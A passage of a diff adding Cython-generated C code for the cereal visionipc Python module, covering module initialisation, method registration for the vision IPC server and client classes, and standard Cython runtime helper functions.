104, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + + /* "EnumType":105 + * __Pyx_globals['VISION_STREAM_DRIVER'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_DRIVER), 'VISION_STREAM_DRIVER') + * __Pyx_globals['VISION_STREAM_WIDE_ROAD'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_WIDE_ROAD), 'VISION_STREAM_WIDE_ROAD') + * __Pyx_globals['VISION_STREAM_MAP'] = VisionStreamType(__Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(VISION_STREAM_MAP), 'VISION_STREAM_MAP') # <<<<<<<<<<<<<< + * + */ + __Pyx_GetModuleGlobalName(__pyx_t_5, __pyx_n_s_VisionStreamType); if (unlikely(!__pyx_t_5)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_5); + __pyx_t_10 = __Pyx_PyInt_From_enum____pyx_t_6cereal_9visionipc_13visionipc_pyx_VisionStreamType(__pyx_e_6cereal_9visionipc_13visionipc_pyx_VISION_STREAM_MAP); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_3 = PyTuple_New(2); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_GIVEREF(__pyx_t_10); + PyTuple_SET_ITEM(__pyx_t_3, 0, __pyx_t_10); + __Pyx_INCREF(__pyx_n_s_VISION_STREAM_MAP); + __Pyx_GIVEREF(__pyx_n_s_VISION_STREAM_MAP); + PyTuple_SET_ITEM(__pyx_t_3, 1, __pyx_n_s_VISION_STREAM_MAP); + __pyx_t_10 = 0; + __pyx_t_10 = __Pyx_PyObject_Call(__pyx_t_5, __pyx_t_3, NULL); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + if (unlikely(__Pyx_globals == Py_None)) { + PyErr_SetString(PyExc_TypeError, "'NoneType' object is not subscriptable"); + __PYX_ERR(1, 105, __pyx_L1_error) + } + if (unlikely((PyDict_SetItem(__Pyx_globals, __pyx_n_s_VISION_STREAM_MAP, __pyx_t_10) < 0))) __PYX_ERR(1, 105, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + } + __pyx_L33:; + + /* "cereal/visionipc/visionipc_pyx.pyx":4 + * # cython: c_string_encoding=ascii, language_level=3 + * + * import sys # <<<<<<<<<<<<<< + * import numpy as np + * cimport numpy as cnp + */ + __pyx_t_10 = __Pyx_ImportDottedModule(__pyx_n_s_sys, NULL); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 4, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_sys, __pyx_t_10) < 0) __PYX_ERR(0, 4, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":5 + * + * import sys + * import numpy as np # <<<<<<<<<<<<<< + * cimport numpy as cnp + * from cython.view cimport array + */ + __pyx_t_10 = __Pyx_ImportDottedModule(__pyx_n_s_numpy, NULL); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 5, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_np, __pyx_t_10) < 0) __PYX_ERR(0, 5, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":20 + * + * + * def get_endpoint_name(string name, VisionStreamType stream): # <<<<<<<<<<<<<< + * return cpp_get_endpoint_name(name, stream).decode('utf-8') + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_1get_endpoint_name, 0, __pyx_n_s_get_endpoint_name, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__45)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 20, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_get_endpoint_name, __pyx_t_10) < 0) __PYX_ERR(0, 20, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_1__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionBuf___reduce_cython, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__46)); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_10) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.buf cannot be converted to a Python object for pickling" + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_9VisionBuf_3__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionBuf___setstate_cython, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__47)); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_10) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":69 + * self.server = new cppVisionIpcServer(name, NULL, NULL) + * + * def create_buffers(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height): # <<<<<<<<<<<<<< + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_3create_buffers, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer_create_buffers, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__49)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_dict, __pyx_n_s_create_buffers, __pyx_t_10) < 0) __PYX_ERR(0, 69, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + + /* "cereal/visionipc/visionipc_pyx.pyx":72 + * self.server.create_buffers(tp, num_buffers, rgb, width, height) + * + * def create_buffers_with_sizes(self, VisionStreamType tp, size_t num_buffers, bool rgb, size_t width, size_t height, size_t size, size_t stride, size_t uv_offset): # <<<<<<<<<<<<<< + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_5create_buffers_with_sizes, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer_create_buffers_w, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__51)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_dict, __pyx_n_s_create_buffers_with_sizes, __pyx_t_10) < 0) __PYX_ERR(0, 72, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + + /* "cereal/visionipc/visionipc_pyx.pyx":75 + * self.server.create_buffers_with_sizes(tp, num_buffers, rgb, width, height, size, stride, uv_offset) + * + * def send(self, VisionStreamType tp, const unsigned char[:] data, uint32_t frame_id=0, uint64_t timestamp_sof=0, uint64_t timestamp_eof=0): # <<<<<<<<<<<<<< + * cdef cppVisionBuf * buf = self.server.get_buffer(tp) + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_7send, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer_send, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__53)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_10, __pyx_tuple__54); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_dict, __pyx_n_s_send, __pyx_t_10) < 0) __PYX_ERR(0, 75, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + + /* "cereal/visionipc/visionipc_pyx.pyx":90 + * self.server.send(buf, &extra, False) + * + * def start_listener(self): # <<<<<<<<<<<<<< + * self.server.start_listener() + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_9start_listener, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer_start_listener, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__55)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer->tp_dict, __pyx_n_s_start_listener, __pyx_t_10) < 0) __PYX_ERR(0, 90, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcServer); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_13__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer___reduce_cython, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__56)); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_10) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "self.server cannot be converted to a Python object for pickling" + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcServer_15__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcServer___setstate_cytho, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__57)); if (unlikely(!__pyx_t_10)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_10) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":151 + * return self.extra.valid + * + * def recv(self, int timeout_ms=100): # <<<<<<<<<<<<<< + * buf = self.client.recv(&self.extra, timeout_ms) + * if not buf: + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_5recv, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient_recv, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__59)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 151, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_10, __pyx_tuple__60); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dict, __pyx_n_s_recv, __pyx_t_10) < 0) __PYX_ERR(0, 151, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + + /* "cereal/visionipc/visionipc_pyx.pyx":157 + * return VisionBuf.create(buf) + * + * def connect(self, bool blocking): # <<<<<<<<<<<<<< + * return self.client.connect(blocking) + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_7connect, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient_connect, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__62)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 157, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dict, __pyx_n_s_connect, __pyx_t_10) < 0) __PYX_ERR(0, 157, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + + /* "cereal/visionipc/visionipc_pyx.pyx":160 + * return self.client.connect(blocking) + * + * def is_connected(self): # <<<<<<<<<<<<<< + * return self.client.is_connected() + * + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_9is_connected, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient_is_connected, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__63)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 160, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dict, __pyx_n_s_is_connected, __pyx_t_10) < 0) __PYX_ERR(0, 160, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + + /* "cereal/visionipc/visionipc_pyx.pyx":163 + * return self.client.is_connected() + * + * @staticmethod # <<<<<<<<<<<<<< + * def available_streams(string name, bool block): + * return cppVisionIpcClient.getAvailableStreams(name, block) + */ + __pyx_t_10 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_11available_streams, __Pyx_CYFUNCTION_STATICMETHOD | __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient_available_stream, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__65)); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dict, __pyx_n_s_available_streams, __pyx_t_10) < 0) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + __Pyx_GetNameInClass(__pyx_t_10, (PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient, __pyx_n_s_available_streams); if (unlikely(!__pyx_t_10)) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_10); + __pyx_t_3 = __Pyx_PyObject_CallOneArg(__pyx_builtin_staticmethod, __pyx_t_10); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_10); __pyx_t_10 = 0; + if (PyDict_SetItem((PyObject *)__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient->tp_dict, __pyx_n_s_available_streams, __pyx_t_3) < 0) __PYX_ERR(0, 163, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + PyType_Modified(__pyx_ptype_6cereal_9visionipc_13visionipc_pyx_VisionIpcClient); + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_13__reduce_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient___reduce_cython, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__66)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_reduce_cython, __pyx_t_3) < 0) __PYX_ERR(1, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_6cereal_9visionipc_13visionipc_pyx_15VisionIpcClient_15__setstate_cython__, __Pyx_CYFUNCTION_CCLASS, __pyx_n_s_VisionIpcClient___setstate_cytho, NULL, __pyx_kp_s_cereal_visionipc_visionipc_pyx, __pyx_d, ((PyObject *)__pyx_codeobj__67)); if (unlikely(!__pyx_t_3)) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_setstate_cython, __pyx_t_3) < 0) __PYX_ERR(1, 3, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /* "cereal/visionipc/visionipc_pyx.pyx":1 + * # distutils: language = c++ # <<<<<<<<<<<<<< + * # cython: c_string_encoding=ascii, language_level=3 + * + */ + __pyx_t_3 = __Pyx_PyDict_NewPresized(0); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_3) < 0) __PYX_ERR(0, 1, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + + /*--- Wrapped vars code ---*/ + + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_10); + if (__pyx_m) { + if (__pyx_d && stringtab_initialized) { + __Pyx_AddTraceback("init cereal.visionipc.visionipc_pyx", __pyx_clineno, __pyx_lineno, __pyx_filename); + } + #if !CYTHON_USE_MODULE_STATE + Py_CLEAR(__pyx_m); + #else + Py_DECREF(__pyx_m); + if (pystate_addmodule_run) { + PyObject *tp, *value, *tb; + PyErr_Fetch(&tp, &value, &tb); + PyState_RemoveModule(&__pyx_moduledef); + PyErr_Restore(tp, value, tb); + } + #endif + } else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_ImportError, "init cereal.visionipc.visionipc_pyx"); + } + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + #if CYTHON_PEP489_MULTI_PHASE_INIT + return (__pyx_m != NULL) ? 0 : -1; + #elif PY_MAJOR_VERSION >= 3 + return __pyx_m; + #else + return; + #endif +} +/* #### Code section: cleanup_globals ### */ +/* #### Code section: cleanup_module ### */ +/* #### Code section: main_method ### */ +/* #### Code section: utility_code_pragmas ### */ +#ifdef _MSC_VER +#pragma warning( push ) +/* Warning 4127: conditional expression is constant + * Cython uses constant conditional expressions to allow in inline functions to be optimized at + * compile-time, so this warning is not useful + */ +#pragma warning( disable : 4127 ) +#endif + + + +/* #### Code section: utility_code_def ### */ + +/* --- Runtime support code --- */ +/* Refnanny */ +#if CYTHON_REFNANNY +static __Pyx_RefNannyAPIStruct *__Pyx_RefNannyImportAPI(const char *modname) { + PyObject *m = NULL, *p = NULL; + void *r = NULL; + m = PyImport_ImportModule(modname); + if (!m) goto end; + p = PyObject_GetAttrString(m, "RefNannyAPI"); + if (!p) goto end; + r = PyLong_AsVoidPtr(p); +end: + Py_XDECREF(p); + Py_XDECREF(m); + return (__Pyx_RefNannyAPIStruct *)r; +} +#endif + +/* PyErrExceptionMatches */ +#if CYTHON_FAST_THREAD_STATE +static int __Pyx_PyErr_ExceptionMatchesTuple(PyObject *exc_type, PyObject *tuple) { + Py_ssize_t i, n; + n = PyTuple_GET_SIZE(tuple); +#if PY_MAJOR_VERSION >= 3 + for (i=0; i= 0x030C00A6 + PyObject *current_exception = tstate->current_exception; + if (unlikely(!current_exception)) return 0; + exc_type = (PyObject*) Py_TYPE(current_exception); + if (exc_type == err) return 1; +#else + exc_type = tstate->curexc_type; + if (exc_type == err) return 1; + if (unlikely(!exc_type)) return 0; +#endif + #if CYTHON_AVOID_BORROWED_REFS + Py_INCREF(exc_type); + #endif + if (unlikely(PyTuple_Check(err))) { + result = __Pyx_PyErr_ExceptionMatchesTuple(exc_type, err); + } else { + result = __Pyx_PyErr_GivenExceptionMatches(exc_type, err); + } + #if CYTHON_AVOID_BORROWED_REFS + Py_DECREF(exc_type); + #endif + return result; +} +#endif + +/* PyErrFetchRestore */ +#if CYTHON_FAST_THREAD_STATE +static CYTHON_INLINE void __Pyx_ErrRestoreInState(PyThreadState *tstate, PyObject *type, PyObject *value, PyObject *tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject *tmp_value; + assert(type == NULL || (value != NULL && type == (PyObject*) Py_TYPE(value))); + if (value) { + #if CYTHON_COMPILING_IN_CPYTHON + if (unlikely(((PyBaseExceptionObject*) value)->traceback != tb)) + #endif + PyException_SetTraceback(value, tb); + } + tmp_value = tstate->current_exception; + tstate->current_exception = value; + Py_XDECREF(tmp_value); +#else + PyObject *tmp_type, *tmp_value, *tmp_tb; + tmp_type = tstate->curexc_type; + tmp_value = tstate->curexc_value; + tmp_tb = tstate->curexc_traceback; + tstate->curexc_type = type; + tstate->curexc_value = value; + tstate->curexc_traceback = tb; + Py_XDECREF(tmp_type); + Py_XDECREF(tmp_value); + Py_XDECREF(tmp_tb); +#endif +} +static CYTHON_INLINE void __Pyx_ErrFetchInState(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) { +#if PY_VERSION_HEX >= 0x030C00A6 + PyObject* exc_value; + exc_value = tstate->current_exception; + tstate->current_exception = 0; + *value = exc_value; + *type = NULL; + *tb = NULL; + if (exc_value) { + *type = (PyObject*) Py_TYPE(exc_value); + Py_INCREF(*type); + #if CYTHON_COMPILING_IN_CPYTHON + *tb = ((PyBaseExceptionObject*) exc_value)->traceback; + Py_XINCREF(*tb); + #else + *tb = PyException_GetTraceback(exc_value); + #endif + } +#else + *type = tstate->curexc_type; + *value = tstate->curexc_value; + *tb = tstate->curexc_traceback; + tstate->curexc_type = 0; + tstate->curexc_value = 0; + tstate->curexc_traceback = 0; +#endif +} +#endif + +/* PyObjectGetAttrStr */ +#if CYTHON_USE_TYPE_SLOTS +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStr(PyObject* obj, PyObject* attr_name) { + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro)) + return tp->tp_getattro(obj, attr_name); +#if PY_MAJOR_VERSION < 3 + if (likely(tp->tp_getattr)) + return tp->tp_getattr(obj, PyString_AS_STRING(attr_name)); +#endif + return PyObject_GetAttr(obj, attr_name); +} +#endif + +/* PyObjectGetAttrStrNoError */ +static void __Pyx_PyObject_GetAttrStr_ClearAttributeError(void) { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + if (likely(__Pyx_PyErr_ExceptionMatches(PyExc_AttributeError))) + __Pyx_PyErr_Clear(); +} +static CYTHON_INLINE PyObject* __Pyx_PyObject_GetAttrStrNoError(PyObject* obj, PyObject* attr_name) { + PyObject *result; +#if CYTHON_COMPILING_IN_CPYTHON && CYTHON_USE_TYPE_SLOTS && PY_VERSION_HEX >= 0x030700B1 + PyTypeObject* tp = Py_TYPE(obj); + if (likely(tp->tp_getattro == PyObject_GenericGetAttr)) { + return _PyObject_GenericGetAttrWithDict(obj, attr_name, NULL, 1); + } +#endif + result = __Pyx_PyObject_GetAttrStr(obj, attr_name); + if (unlikely(!result)) { + __Pyx_PyObject_GetAttrStr_ClearAttributeError(); + } + return result; +} + +/* GetBuiltinName */ +static PyObject *__Pyx_GetBuiltinName(PyObject *name) { + PyObject* result = __Pyx_PyObject_GetAttrStrNoError(__pyx_b, name); + if (unlikely(!result) && !PyErr_Occurred()) { + PyErr_Format(PyExc_NameError, +#if PY_MAJOR_VERSION >= 3 + "name '%U' is not defined", name); +#else + "name '%.200s' is not defined", PyString_AS_STRING(name)); +#endif + } + return result; +} + +/* TupleAndListFromArray */ +#if CYTHON_COMPILING_IN_CPYTHON +static CYTHON_INLINE void __Pyx_copy_object_array(PyObject *const *CYTHON_RESTRICT src, PyObject** CYTHON_RESTRICT dest, Py_ssize_t length) { + PyObject *v; + Py_ssize_t i; + for (i = 0; i < length; i++) { + v = dest[i] = src[i]; + Py_INCREF(v); + } +} +static CYTHON_INLINE PyObject * +__Pyx_PyTuple_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + Py_INCREF(__pyx_empty_tuple); + return __pyx_empty_tuple; + } + res = PyTuple_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyTupleObject*)res)->ob_item, n); + return res; +} +static CYTHON_INLINE PyObject * +__Pyx_PyList_FromArray(PyObject *const *src, Py_ssize_t n) +{ + PyObject *res; + if (n <= 0) { + return PyList_New(0); + } + res = PyList_New(n); + if (unlikely(res == NULL)) return NULL; + __Pyx_copy_object_array(src, ((PyListObject*)res)->ob_item, n); + return res; +} +#endif + +/* BytesEquals */ +static CYTHON_INLINE int __Pyx_PyBytes_Equals(PyObject* s1, PyObject* s2, int equals) { +#if CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API + return PyObject_RichCompareBool(s1, s2, equals); +#else + if (s1 == s2) { + return (equals == Py_EQ); + } else if (PyBytes_CheckExact(s1) & PyBytes_CheckExact(s2)) { + const char *ps1, *ps2; + Py_ssize_t length = PyBytes_GET_SIZE(s1); + if (length != PyBytes_GET_SIZE(s2)) + return (equals == Py_NE); + ps1 = PyBytes_AS_STRING(s1); + ps2 = PyBytes_AS_STRING(s2); + if (ps1[0] != ps2[0]) { + return (equals == Py_NE); + } else if (length == 1) { + return (equals == Py_EQ); + } else { + int result; +#if CYTHON_USE_UNICODE_INTERNALS && (PY_VERSION_HEX < 0x030B0000) + Py_hash_t hash1, hash2; + hash1 = ((PyBytesObject*)s1)->ob_shash; + hash2 = ((PyBytesObject*)s2)->ob_shash; + if (hash1 != hash2 && hash1 != 